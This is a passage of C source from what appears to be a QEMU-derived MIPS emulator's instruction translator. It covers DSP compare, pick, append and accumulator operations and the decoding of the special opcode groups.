tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 8); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 16); tcg_gen_or_tl(tcg_ctx, 
tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 32); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); break; case OPC_REPLV_PW: check_dsp(ctx); tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 32); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); break; case OPC_REPLV_QH: check_dsp(ctx); tcg_gen_ext16u_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], val_t); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); tcg_gen_shli_tl(tcg_ctx, t0, tcg_ctx->cpu_gpr[ret], 32); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); break; } break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, val_t); } static void gen_mipsdsp_add_cmp_pick(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int v1, int v2, int check_ret) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t1; TCGv v1_t; TCGv v2_t; if ((ret == 0) && (check_ret == 1)) { /* Treat as NOP. */ return; } t1 = tcg_temp_new(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (op1) { case OPC_CMPU_EQ_QB_DSP: switch (op2) { case OPC_CMPU_EQ_QB: check_dsp(ctx); gen_helper_cmpu_eq_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPU_LT_QB: check_dsp(ctx); gen_helper_cmpu_lt_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPU_LE_QB: check_dsp(ctx); gen_helper_cmpu_le_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGU_EQ_QB: check_dsp(ctx); gen_helper_cmpgu_eq_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGU_LT_QB: check_dsp(ctx); gen_helper_cmpgu_lt_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGU_LE_QB: check_dsp(ctx); gen_helper_cmpgu_le_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGDU_EQ_QB: check_dsp_r2(ctx); gen_helper_cmpgu_eq_qb(tcg_ctx, t1, v1_t, v2_t); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], t1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, t1); break; case OPC_CMPGDU_LT_QB: check_dsp_r2(ctx); gen_helper_cmpgu_lt_qb(tcg_ctx, t1, v1_t, v2_t); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], t1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, t1); break; case OPC_CMPGDU_LE_QB: check_dsp_r2(ctx); gen_helper_cmpgu_le_qb(tcg_ctx, t1, v1_t, v2_t); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], t1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, t1); break; case OPC_CMP_EQ_PH: check_dsp(ctx); gen_helper_cmp_eq_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LT_PH: check_dsp(ctx); gen_helper_cmp_lt_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LE_PH: check_dsp(ctx); gen_helper_cmp_le_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PICK_QB: check_dsp(ctx); gen_helper_pick_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PICK_PH: check_dsp(ctx); gen_helper_pick_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, 
tcg_ctx->cpu_env); break; case OPC_PACKRL_PH: check_dsp(ctx); gen_helper_packrl_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; } break; #ifdef TARGET_MIPS64 case OPC_CMPU_EQ_OB_DSP: switch (op2) { case OPC_CMP_EQ_PW: check_dsp(ctx); gen_helper_cmp_eq_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LT_PW: check_dsp(ctx); gen_helper_cmp_lt_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LE_PW: check_dsp(ctx); gen_helper_cmp_le_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_EQ_QH: check_dsp(ctx); gen_helper_cmp_eq_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LT_QH: check_dsp(ctx); gen_helper_cmp_lt_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMP_LE_QH: check_dsp(ctx); gen_helper_cmp_le_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGDU_EQ_OB: check_dsp_r2(ctx); gen_helper_cmpgdu_eq_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGDU_LT_OB: check_dsp_r2(ctx); gen_helper_cmpgdu_lt_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGDU_LE_OB: check_dsp_r2(ctx); gen_helper_cmpgdu_le_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPGU_EQ_OB: check_dsp(ctx); gen_helper_cmpgu_eq_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGU_LT_OB: check_dsp(ctx); gen_helper_cmpgu_lt_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPGU_LE_OB: check_dsp(ctx); gen_helper_cmpgu_le_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_CMPU_EQ_OB: check_dsp(ctx); gen_helper_cmpu_eq_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPU_LT_OB: check_dsp(ctx); gen_helper_cmpu_lt_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_CMPU_LE_OB: check_dsp(ctx); gen_helper_cmpu_le_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PACKRL_PW: check_dsp(ctx); gen_helper_packrl_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PICK_OB: check_dsp(ctx); gen_helper_pick_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PICK_PW: check_dsp(ctx); gen_helper_pick_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PICK_QH: check_dsp(ctx); gen_helper_pick_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #endif } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } static void gen_mipsdsp_append(CPUMIPSState *env, DisasContext *ctx, uint32_t op1, int rt, int rs, int sa) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; check_dsp_r2(ctx); if (rt == 0) { /* Treat as NOP. 
*/ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); switch (op1) { case OPC_APPEND_DSP: switch (MASK_APPEND(ctx->opcode)) { case OPC_APPEND: if (sa != 0) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, tcg_ctx->cpu_gpr[rt], sa, 32 - sa); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); break; case OPC_PREPEND: if (sa != 0) { tcg_gen_ext32u_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], sa); tcg_gen_shli_tl(tcg_ctx, t0, t0, 32 - sa); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], t0); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); break; case OPC_BALIGN: sa &= 3; if (sa != 0 && sa != 2) { tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], 8 * sa); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (4 - sa)); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], t0); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); break; default: /* Invalid */ MIPS_INVAL("MASK APPEND"); generate_exception_end(ctx, EXCP_RI); break; } break; #ifdef TARGET_MIPS64 case OPC_DAPPEND_DSP: switch (MASK_DAPPEND(ctx->opcode)) { case OPC_DAPPEND: if (sa != 0) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, tcg_ctx->cpu_gpr[rt], sa, 64 - sa); } break; case OPC_PREPENDD: tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], 0x20 | sa); tcg_gen_shli_tl(tcg_ctx, t0, t0, 64 - (0x20 | sa)); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, t0); break; case OPC_PREPENDW: if (sa != 0) { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], sa); tcg_gen_shli_tl(tcg_ctx, t0, t0, 64 - sa); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], t0); } break; case OPC_DBALIGN: sa &= 7; if (sa != 0 && sa != 2 && sa != 4) { tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], 8 * sa); tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (8 - sa)); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], t0); } break; default: /* Invalid */ MIPS_INVAL("MASK DAPPEND"); generate_exception_end(ctx, EXCP_RI); break; } break; #endif } tcg_temp_free(tcg_ctx, t0); } static void gen_mipsdsp_accinsn(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int v1, int v2, int check_ret) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv t1; TCGv v1_t; TCGv v2_t; int16_t imm; if ((ret == 0) && (check_ret == 1)) { /* Treat as NOP. 
*/ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (op1) { case OPC_EXTR_W_DSP: check_dsp(ctx); switch (op2) { case OPC_EXTR_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extr_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTR_R_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extr_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTR_RS_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extr_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTR_S_H: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extr_s_h(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTRV_S_H: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extr_s_h(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTRV_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extr_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTRV_R_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extr_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTRV_RS_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extr_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTP: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTPV: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_EXTPDP: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extpdp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_EXTPDPV: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_extpdp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_SHILO: imm = (ctx->opcode >> 20) & 0x3F; tcg_gen_movi_tl(tcg_ctx, t0, ret); tcg_gen_movi_tl(tcg_ctx, t1, imm); gen_helper_shilo(tcg_ctx, t0, t1, tcg_ctx->cpu_env); break; case OPC_SHILOV: tcg_gen_movi_tl(tcg_ctx, t0, ret); gen_helper_shilo(tcg_ctx, t0, v1_t, tcg_ctx->cpu_env); break; case OPC_MTHLIP: tcg_gen_movi_tl(tcg_ctx, t0, ret); gen_helper_mthlip(tcg_ctx, t0, v1_t, tcg_ctx->cpu_env); break; case OPC_WRDSP: imm = (ctx->opcode >> 11) & 0x3FF; tcg_gen_movi_tl(tcg_ctx, t0, imm); gen_helper_wrdsp(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); break; case OPC_RDDSP: imm = (ctx->opcode >> 16) & 0x03FF; tcg_gen_movi_tl(tcg_ctx, t0, imm); gen_helper_rddsp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, tcg_ctx->cpu_env); break; } break; #ifdef TARGET_MIPS64 case OPC_DEXTR_W_DSP: check_dsp(ctx); switch (op2) { case OPC_DMTHLIP: tcg_gen_movi_tl(tcg_ctx, t0, ret); gen_helper_dmthlip(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); break; case OPC_DSHILO: { int shift = (ctx->opcode >> 19) & 0x7F; int ac = (ctx->opcode >> 11) & 0x03; tcg_gen_movi_tl(tcg_ctx, t0, shift); tcg_gen_movi_tl(tcg_ctx, t1, ac); gen_helper_dshilo(tcg_ctx, t0, t1, tcg_ctx->cpu_env); break; } case OPC_DSHILOV: { int ac = (ctx->opcode >> 11) & 0x03; tcg_gen_movi_tl(tcg_ctx, t0, ac); gen_helper_dshilo(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); break; } case OPC_DEXTP: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextp(tcg_ctx, 
tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTPV: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTPDP: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextpdp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTPDPV: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextpdp(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTR_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_R_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_r_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_RS_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_rs_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_R_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_RS_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTR_S_H: tcg_gen_movi_tl(tcg_ctx, t0, v2); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_dextr_s_h(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); break; case OPC_DEXTRV_S_H: tcg_gen_movi_tl(tcg_ctx, t0, v2); /* variable variant: the shift amount comes from the rs register, as in the other DEXTRV cases */ gen_helper_dextr_s_h(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_R_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_r_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_RS_L: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_rs_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_R_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; case OPC_DEXTRV_RS_W: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_dextr_rs_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); break; } break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } /* End MIPSDSP functions. 
*/ static void decode_opc_special_r6(CPUMIPSState *env, DisasContext *ctx) { int rs, rt, rd, sa; uint32_t op1, op2; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; op1 = MASK_SPECIAL(ctx->opcode); switch (op1) { case OPC_LSA: gen_lsa(ctx, op1, rd, rs, rt, extract32(ctx->opcode, 6, 2)); break; case OPC_MULT: case OPC_MULTU: case OPC_DIV: case OPC_DIVU: op2 = MASK_R6_MULDIV(ctx->opcode); switch (op2) { case R6_OPC_MUL: case R6_OPC_MUH: case R6_OPC_MULU: case R6_OPC_MUHU: case R6_OPC_DIV: case R6_OPC_MOD: case R6_OPC_DIVU: case R6_OPC_MODU: gen_r6_muldiv(ctx, op2, rd, rs, rt); break; default: MIPS_INVAL("special_r6 muldiv"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_SELEQZ: case OPC_SELNEZ: gen_cond_move(ctx, op1, rd, rs, rt); break; case R6_OPC_CLO: case R6_OPC_CLZ: if (rt == 0 && sa == 1) { /* * Major opcode and function field is shared with preR6 MFHI/MTHI. * We need additionally to check other fields. */ gen_cl(ctx, op1, rd, rs); } else { generate_exception_end(ctx, EXCP_RI); } break; case R6_OPC_SDBBP: if (is_uhi(extract32(ctx->opcode, 6, 20))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception_end(ctx, EXCP_RI); } else { generate_exception_end(ctx, EXCP_DBp); } } break; #if defined(TARGET_MIPS64) case OPC_DLSA: check_mips_64(ctx); gen_lsa(ctx, op1, rd, rs, rt, extract32(ctx->opcode, 6, 2)); break; case R6_OPC_DCLO: case R6_OPC_DCLZ: if (rt == 0 && sa == 1) { /* * Major opcode and function field is shared with preR6 MFHI/MTHI. * We need additionally to check other fields. */ check_mips_64(ctx); gen_cl(ctx, op1, rd, rs); } else { generate_exception_end(ctx, EXCP_RI); } break; case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: op2 = MASK_R6_MULDIV(ctx->opcode); switch (op2) { case R6_OPC_DMUL: case R6_OPC_DMUH: case R6_OPC_DMULU: case R6_OPC_DMUHU: case R6_OPC_DDIV: case R6_OPC_DMOD: case R6_OPC_DDIVU: case R6_OPC_DMODU: check_mips_64(ctx); gen_r6_muldiv(ctx, op2, rd, rs, rt); break; default: MIPS_INVAL("special_r6 muldiv"); generate_exception_end(ctx, EXCP_RI); break; } break; #endif default: /* Invalid */ MIPS_INVAL("special_r6"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special_tx79(CPUMIPSState *env, DisasContext *ctx) { int rs = extract32(ctx->opcode, 21, 5); int rt = extract32(ctx->opcode, 16, 5); int rd = extract32(ctx->opcode, 11, 5); uint32_t op1 = MASK_SPECIAL(ctx->opcode); switch (op1) { case OPC_MOVN: /* Conditional move */ case OPC_MOVZ: gen_cond_move(ctx, op1, rd, rs, rt); break; case OPC_MFHI: /* Move from HI/LO */ case OPC_MFLO: gen_HILO(ctx, op1, 0, rd); break; case OPC_MTHI: case OPC_MTLO: /* Move to HI/LO */ gen_HILO(ctx, op1, 0, rs); break; case OPC_MULT: case OPC_MULTU: gen_mul_txx9(ctx, op1, rd, rs, rt); break; case OPC_DIV: case OPC_DIVU: gen_muldiv(ctx, op1, 0, rs, rt); break; #if defined(TARGET_MIPS64) case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: check_insn_opc_user_only(ctx, INSN_R5900); gen_muldiv(ctx, op1, 0, rs, rt); break; #endif case OPC_JR: gen_compute_branch(ctx, op1, 4, rs, 0, 0, 4); break; default: /* Invalid */ MIPS_INVAL("special_tx79"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special_legacy(CPUMIPSState *env, DisasContext *ctx) { int rs, rt, rd, sa; uint32_t op1; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 
0x1f; op1 = MASK_SPECIAL(ctx->opcode); switch (op1) { case OPC_MOVN: /* Conditional move */ case OPC_MOVZ: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32 | INSN_LOONGSON2E | INSN_LOONGSON2F); gen_cond_move(ctx, op1, rd, rs, rt); break; case OPC_MFHI: /* Move from HI/LO */ case OPC_MFLO: gen_HILO(ctx, op1, rs & 3, rd); break; case OPC_MTHI: case OPC_MTLO: /* Move to HI/LO */ gen_HILO(ctx, op1, rd & 3, rs); break; case OPC_MOVCI: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); if (env->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); gen_movci(ctx, rd, rs, (ctx->opcode >> 18) & 0x7, (ctx->opcode >> 16) & 1); } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; case OPC_MULT: case OPC_MULTU: if (sa) { check_insn(ctx, INSN_VR54XX); op1 = MASK_MUL_VR54XX(ctx->opcode); gen_mul_vr54xx(ctx, op1, rd, rs, rt); } else { gen_muldiv(ctx, op1, rd & 3, rs, rt); } break; case OPC_DIV: case OPC_DIVU: gen_muldiv(ctx, op1, 0, rs, rt); break; #if defined(TARGET_MIPS64) case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, op1, 0, rs, rt); break; #endif case OPC_JR: gen_compute_branch(ctx, op1, 4, rs, rd, sa, 4); break; case OPC_SPIM: #ifdef MIPS_STRICT_STANDARD MIPS_INVAL("SPIM"); generate_exception_end(ctx, EXCP_RI); #else /* Implemented as RI exception for now. */ MIPS_INVAL("spim (unofficial)"); generate_exception_end(ctx, EXCP_RI); #endif break; default: /* Invalid */ MIPS_INVAL("special_legacy"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, rt, rd, sa; uint32_t op1; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; op1 = MASK_SPECIAL(ctx->opcode); switch (op1) { case OPC_SLL: /* Shift with immediate */ if (sa == 5 && rd == 0 && rs == 0 && rt == 0) { /* PAUSE */ if ((ctx->insn_flags & ISA_MIPS32R6) && (ctx->hflags & MIPS_HFLAG_BMASK)) { generate_exception_end(ctx, EXCP_RI); break; } } /* Fallthrough */ case OPC_SRA: gen_shift_imm(ctx, op1, rd, rt, sa); break; case OPC_SRL: switch ((ctx->opcode >> 21) & 0x1f) { case 1: /* rotr is decoded as srl on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_ROTR; } /* Fallthrough */ case 0: gen_shift_imm(ctx, op1, rd, rt, sa); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_ADD: case OPC_ADDU: 